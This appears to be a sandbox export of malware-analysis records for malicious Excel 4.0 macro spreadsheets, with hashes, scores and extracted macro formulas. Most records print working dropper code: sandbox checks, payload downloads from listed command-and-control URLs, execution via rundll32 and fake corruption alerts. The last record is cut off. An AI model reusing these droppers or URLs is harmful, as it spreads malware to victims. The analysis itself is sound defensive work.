{"version":"0.2","sample":{"sample":"","kind":"file","target":"8fecb6c6da8dc6c365b74749559dc15af0413e0c5644b617bf41ae4abdd4d675"},"analysis":{"reported":"2020-04-09T16:17:40Z","score":10},"files":[{"filename":"8fecb6c6da8dc6c365b74749559dc15af0413e0c5644b617bf41ae4abdd4d675","filesize":182784,"md5":"0470d2f0314c870ee33b609ea7d2bed7","sha1":"9cb2539e97dfe00ffc60aad413b1f5fdfab87cb9","sha256":"8fecb6c6da8dc6c365b74749559dc15af0413e0c5644b617bf41ae4abdd4d675","sha512":"b4e372f1c493ae924eeba171eeca05d717aba1360cd7fff7a83c5007b0a1f5152cca948e3ceb7942bd278565ebc9ad664eaa7a85c7615c44ad9299974e134d51","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8fecb6c6da8dc6c365b74749559dc15af0413e0c5644b617bf41ae4abdd4d675.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://g2creditsolutions.com/trusty/444444.png","http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png"],"attr":{"formulas":"ERROR(FALSE)\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://g2creditsolutions.com/trusty/444444.png\",\"c:\\Users\\Public\\1.exe\",0,0)\nIF(R$1C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://lorrainehomeconsulting.com/wp-content/uploads/2020/02/trusty/187213.png\",\"c:\\Users\\Public\\1.exe\",0,0),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\1.exe\")\nCLOSE(FALSE)\nWORKBOOK.HIDE(\"SDJKv3\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8ff45c8687638832b5b115a38d744b15702956d4290f6cf8ef3465edd3c3fccb"},"analysis":{"reported":"2020-04-09T16:17:40Z","score":10},"files":[{"filename":"8ff45c8687638832b5b115a38d744b15702956d4290f6cf8ef3465edd3c3fccb","filesize":185344,"md5":"1babbc356b67278da865f91dad1e6252","sha1":"f1803e314c079511e4b7cbd74e5dd59e69ab5c6a","sha256":"8ff45c8687638832b5b115a38d744b15702956d4290f6cf8ef3465edd3c3fccb","sha512":"5ef37c220daf6a7ff08629068ef7fed781e3a718a64222d936ac11c22fd6aec65d820877110faa24c12b2e51ca8da71a4fc95fc9cf411fae371529bd46849aed","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8ff45c8687638832b5b115a38d744b15702956d4290f6cf8ef3465edd3c3fccb.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8ffe1723d582cc81c3a0f8c6ee5355cd71cee115197b80a962196247d2518eb9"},"analysis":{"reported":"2020-04-09T16:17:40Z","score":10},"files":[{"filename":"8ffe1723d582cc81c3a0f8c6ee5355cd71cee115197b80a962196247d2518eb9","filesize":226816,"md5":"043a85c55593ccfe36724afa20600881","sha1":"99a0aa64ec28ff30c629a3354c038864455e3e5c","sha256":"8ffe1723d582cc81c3a0f8c6ee5355cd71cee115197b80a962196247d2518eb9","sha512":"872d35bce5a3ece22dba8d070e03ef11003e1d3a5624f4f9c866dba7fd8390621911a4ee31f4bb06e843c818427a47bb415cd7429ffd7497254d57c4c85a6eba","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8ffe1723d582cc81c3a0f8c6ee5355cd71cee115197b80a962196247d2518eb9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GnrcIUdBXz\",TRUE)\nGOTO(IF(GET.WORKSPACE(19),,CLOSE(TRUE)))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\nIF(R$14C$17\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\nCLOSE(FALSE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"900c0151e4be0b46c9de5f2417f0f309e65ad4e21fd2671e89a725e44033d06a"},"analysis":{"reported":"2020-04-09T16:17:40Z","score":10},"files":[{"filename":"900c0151e4be0b46c9de5f2417f0f309e65ad4e21fd2671e89a725e44033d06a","filesize":185344,"md5":"60eac1df7027876ec53500c07de65469","sha1":"3e8d531c4f2540203eecf4e5566cce0a1333030b","sha256":"900c0151e4be0b46c9de5f2417f0f309e65ad4e21fd2671e89a725e44033d06a","sha512":"21af41acbe3578831937cfcae95547264e34a2842260ff3dc3d266760e04dbbf497bb83fa33e20cec7cff00967f5d69d55c15ff759141c6d66b96bcd4a2c96ad","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"900c0151e4be0b46c9de5f2417f0f309e65ad4e21fd2671e89a725e44033d06a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"900fb4308c69e5bb940b38e30e7d261b18eaf7416cbd1b660bb073232e29019c"},"analysis":{"reported":"2020-04-09T16:17:40Z","score":10},"files":[{"filename":"900fb4308c69e5bb940b38e30e7d261b18eaf7416cbd1b660bb073232e29019c","filesize":170496,"md5":"0b39d405a58c72efd4a8655fffdcabd3","sha1":"42eba9aa28d76fe29e39d35e81a5243d15499800","sha256":"900fb4308c69e5bb940b38e30e7d261b18eaf7416cbd1b660bb073232e29019c","sha512":"d141dcece3ffb5755f9746a5b135cdfdbfff73405491aa22af4ba214ebe1bf68e96aa54033428d4c8f2e81682ac5a388688f25c849d2399621ff51eae2ee6033","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"900fb4308c69e5bb940b38e30e7d261b18eaf7416cbd1b660bb073232e29019c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"reS0AOSmsv\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9062b3867b59c7e3d61fc7341077ea0e5d32c0983032638016a8ac7cd8a17f38"},"analysis":{"reported":"2020-04-09T16:17:41Z","score":10},"files":[{"filename":"9062b3867b59c7e3d61fc7341077ea0e5d32c0983032638016a8ac7cd8a17f38","filesize":214016,"md5":"01d7cda521774f2eac047ac2d3e5dfe2","sha1":"5da909d6bffcadf6277a96816b044cbc1595a5e5","sha256":"9062b3867b59c7e3d61fc7341077ea0e5d32c0983032638016a8ac7cd8a17f38","sha512":"1e7a2ebaef89d237b9556193e2a47447e5fbf31e4d139d7b471fdbde3717c4968f1654d763eb5d22fad6ba6550a49e5d578a22b4a3aac9ff18194e5bbdcf3f01","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9062b3867b59c7e3d61fc7341077ea0e5d32c0983032638016a8ac7cd8a17f38.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"jCTFgtEVaF\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"906fa846e5c200147b4108d17c0176e28886007f97eedb3b6f8899f39ce7719c"},"analysis":{"reported":"2020-04-09T16:17:41Z","score":10},"files":[{"filename":"906fa846e5c200147b4108d17c0176e28886007f97eedb3b6f8899f39ce7719c","filesize":170496,"md5":"409b721737390cb237f64496cba18c48","sha1":"706ac857a7795ada9ab3df27374e1f5a26658ba2","sha256":"906fa846e5c200147b4108d17c0176e28886007f97eedb3b6f8899f39ce7719c","sha512":"376dc79ec4fe9333215e1cece5f33a372291b24b455445bc90b0fbc2fcb24cbb3495e03eca4a62b664605525ac05984974fe59af4246b224bb6a242acb97d7f6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"906fa846e5c200147b4108d17c0176e28886007f97eedb3b6f8899f39ce7719c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"XHPg5FvbOv\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9074319ffc8caf39711373e7bf8f506eeb5daa88df790c05b631a1d8a8ee60e2"},"analysis":{"reported":"2020-04-09T16:17:41Z","score":10},"files":[{"filename":"9074319ffc8caf39711373e7bf8f506eeb5daa88df790c05b631a1d8a8ee60e2","filesize":209920,"md5":"9c82b838e6b1bc6ffece1eb76a25ad54","sha1":"5bf3b6cad3258f1ea4404086a417e73ed05a2807","sha256":"9074319ffc8caf39711373e7bf8f506eeb5daa88df790c05b631a1d8a8ee60e2","sha512":"f9553c1db8926f9d89d11fe41a13159f9dfb79b8377ea586cb709e84cee6a1f86c7f880d8d511e6b50da0f85d5f7d7adc4b779be3641452de07ad05a4f62e78d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9074319ffc8caf39711373e7bf8f506eeb5daa88df790c05b631a1d8a8ee60e2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Ddxc8rBwD1\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"907fffb5c1307199de81f5a9751e23e41f9e943cb71ba5b7a2c6c8afac47128c"},"analysis":{"reported":"2020-04-09T16:17:41Z","score":10},"files":[{"filename":"907fffb5c1307199de81f5a9751e23e41f9e943cb71ba5b7a2c6c8afac47128c","filesize":185344,"md5":"f04217ce4d4a83efe003e41005b6d169","sha1":"e0b3b8cf386ef375e46a2ce305508657f1362432","sha256":"907fffb5c1307199de81f5a9751e23e41f9e943cb71ba5b7a2c6c8afac47128c","sha512":"62b98ca3f3c42398e7209ef42694b9e5c3f397eddc1e5b3a6ad0c3b86263c4aaad92933715f23ac1392e12889a88caba41de5db33d008285a96499d166b42dd3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"907fffb5c1307199de81f5a9751e23e41f9e943cb71ba5b7a2c6c8afac47128c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9083327ae0b13d6bf59b90fff3c991f99d4bfb8b23e7d57502e8e8689ce2baab"},"analysis":{"reported":"2020-04-09T16:17:41Z","score":10},"files":[{"filename":"9083327ae0b13d6bf59b90fff3c991f99d4bfb8b23e7d57502e8e8689ce2baab","filesize":186880,"md5":"50d518246c2b61f5b427948f87a0aa24","sha1":"bb88393623d9d4a65fa07b30c48a017d5c7102cd","sha256":"9083327ae0b13d6bf59b90fff3c991f99d4bfb8b23e7d57502e8e8689ce2baab","sha512":"5cde4b971a09138efd2198161f357f5ca5084986725d1fcf12f6fe8a19cd8e798e755021dfa189136462d96a3369adff208b8626a0906aa54f2cf96dcf6fdb14","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9083327ae0b13d6bf59b90fff3c991f99d4bfb8b23e7d57502e8e8689ce2baab.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nGET.WORKSPACE(1)\nGET.WORKSPACE(32)\nGET.WINDOW(1)\nIF(GET.WORKSPACE(19),CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,GET.NOTE(R$7C$3),GET.NOTE(R$7C$4),0,0),CLOSE(TRUE))\nIF(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2),EXEC(GET.NOTE(R$9C$3)),)\nCLOSE(TRUE)\nWORKBOOK.HIDE(\"Macro251\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"908ad75c149ddc7d3176d5e0dc3319ca62f7019497e8502a8e78e945cba8abf1"},"analysis":{"reported":"2020-04-09T16:17:41Z","score":10},"files":[{"filename":"908ad75c149ddc7d3176d5e0dc3319ca62f7019497e8502a8e78e945cba8abf1","filesize":209920,"md5":"73b46f54a6b4a3245b2435f3bd64c3bb","sha1":"5a4ef0eecf6ba65cbebf04837dbe9914377f3b11","sha256":"908ad75c149ddc7d3176d5e0dc3319ca62f7019497e8502a8e78e945cba8abf1","sha512":"2b5e014fa1be7062e0535be047d0ab8449cc868e307e26bbe1a83d2495015b22bff18c4361e1e30f3b767007a5ccf26e8ac210dda7804f9ff70361fdf7ccad6e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"908ad75c149ddc7d3176d5e0dc3319ca62f7019497e8502a8e78e945cba8abf1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AaAd9lVfol\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9090377916640c7b999ac035c3ea20289d8835f18518a3cf931366df4ea6a09c"},"analysis":{"reported":"2020-04-09T16:17:41Z","score":10},"files":[{"filename":"9090377916640c7b999ac035c3ea20289d8835f18518a3cf931366df4ea6a09c","filesize":167936,"md5":"14d1f5899df4e8d04cc29ceb7c5cae6e","sha1":"e9f8880f749048dc666e62754e942f36e0ca87fc","sha256":"9090377916640c7b999ac035c3ea20289d8835f18518a3cf931366df4ea6a09c","sha512":"a6f30772bd85ecc9c2009c2c941ccac0d95cbe4a44cf88ef96f7c3af3b3cc26097ece73db4d46cba590b6050370ab289d20baccc178bff6a69e862d21cd46988","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9090377916640c7b999ac035c3ea20289d8835f18518a3cf931366df4ea6a09c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8LaOaAXGDM\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9098326d76e1c0709d168e2b46bcb1a0abba4dc5c2eaea49b9cd99183d34a1fc"},"analysis":{"reported":"2020-04-09T16:17:41Z","score":10},"files":[{"filename":"9098326d76e1c0709d168e2b46bcb1a0abba4dc5c2eaea49b9cd99183d34a1fc","filesize":116224,"md5":"dadf7bedfe96b114f50edb67c785e58d","sha1":"ee61d5c0c7363a24f698db63e388d2e0489025e0","sha256":"9098326d76e1c0709d168e2b46bcb1a0abba4dc5c2eaea49b9cd99183d34a1fc","sha512":"cef51aacfe158eea189d7a3fd1c1d6200a7ce2b6fa6f2c5864352a7fe18b4e781cd4b030c2d560370c0eb229797b172a07fe23e83156bea91443f1b7679ab13e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9098326d76e1c0709d168e2b46bcb1a0abba4dc5c2eaea49b9cd99183d34a1fc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HBnAFPuUxt\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"90a3f22cde5051a00bb1b1d3294ed0fd5ac482016f2cbc5a4ac4ec4ebc8d347c"},"analysis":{"reported":"2020-04-09T16:17:41Z","score":10},"files":[{"filename":"90a3f22cde5051a00bb1b1d3294ed0fd5ac482016f2cbc5a4ac4ec4ebc8d347c","filesize":185344,"md5":"bd04cad9229d7a54ea8d2388ab704242","sha1":"9743086cdd5e379a1eff60621ccf336783fcb930","sha256":"90a3f22cde5051a00bb1b1d3294ed0fd5ac482016f2cbc5a4ac4ec4ebc8d347c","sha512":"0b25328adcc5243c8ccaf3b162e21a5aff00cadf87fb3c7d5536a9ccddafe83343577a2d9a4301d76d4e4cc4a33eed450eb5f918fd15d5c7cf525ba9cda0289d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"90a3f22cde5051a00bb1b1d3294ed0fd5ac482016f2cbc5a4ac4ec4ebc8d347c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/DSKVJBdsj2"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"90a7c7176ff855c5bb8cb0f0b7938f0ab761dbf578c23c5fe6664ab101db2f17"},"analysis":{"reported":"2020-04-09T16:17:41Z","score":10},"files":[{"filename":"90a7c7176ff855c5bb8cb0f0b7938f0ab761dbf578c23c5fe6664ab101db2f17","filesize":209408,"md5":"6998be5c32d9ff4cfcc21bb03ebb1f61","sha1":"86cdf772e5c1f43ae37f8397d02cbe0c2093f836","sha256":"90a7c7176ff855c5bb8cb0f0b7938f0ab761dbf578c23c5fe6664ab101db2f17","sha512":"c0ea2254f4dd2444aa3f152fb1b21117d3fe8bd101c0b4808125b684bfdec69a53400ed7fcdd02b34bfba5aaa7bc7ccb7e2b500aaa8e0174dd91dd1a78b6858e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"90a7c7176ff855c5bb8cb0f0b7938f0ab761dbf578c23c5fe6664ab101db2f17.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), 